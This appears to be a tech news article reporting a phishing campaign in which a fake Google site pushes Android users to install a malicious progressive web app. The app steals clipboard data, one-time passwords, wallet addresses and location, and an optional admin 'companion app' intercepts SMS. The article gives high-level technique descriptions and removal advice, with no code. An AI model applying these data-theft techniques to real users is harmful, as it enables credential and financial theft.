- Attackers are abusing progressive web apps (PWAs) on Android
- Victims lured through a phishing site google-prism[dot]com to install malicious PWA
- PWA collects clipboards, crypto wallets, OTP, GPS and more
Threat actors have started turning to progressive web applications (PWAs) to do their evil deeds on Android, stealing login credentials, cryptocurrency wallet data, GPS information and more, experts warned.
Security researchers at Malwarebytes recently detailed one such campaign they detected in the wild, starting with a phishing email, which lured people to a fake Google site google-prism[dot]com.
Under the guise of improving security, victims go through a four-step “security” check that includes the installation of a malicious PWA.
Collecting the data
For those unfamiliar with PWAs, these are websites that can be installed and run like regular apps on the device, but work through the web browser.
Once installed, the PWA requests permissions to send notifications, access clipboard data, and other browser functions, and configures a service worker to enable push notifications, background tasks, and data preparation.
At this point, the malware starts collecting data every time the app is opened. Clipboard contents, cryptocurrency wallet addresses, one-time passwords via WebOTP API, contacts, GPS data, and device fingerprint details are being collected. But since the information can only be collected while the app is open, the PWA will also start sending push notifications to the victim.
The PWA would also establish a WebSocket-based relay and HTTP proxy capability, so attackers can route web requests, scan internal networks, and even access local resources.
In some cases, Malwarebytes said, the victim is also encouraged to download a “companion app” advertised as a “critical security update” that requests broad permissions and registers as the device’s administrator.
This app, obviously for the most gullible, allows for deeper compromise, including SMS interception, keystroke capture via a custom keyboard, notification monitoring, credential theft, and long-term persistence.
If, by chance, you have installed such an application, you can remove it by looking for the “Security Check” entry in the list of installed applications. If your device has an app called “System Service” with a package name com.device.sync, and if you have administrator access, remove the access by going to Settings – Security – Device Management Apps and then uninstall it.
Through beepcomputer
The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.
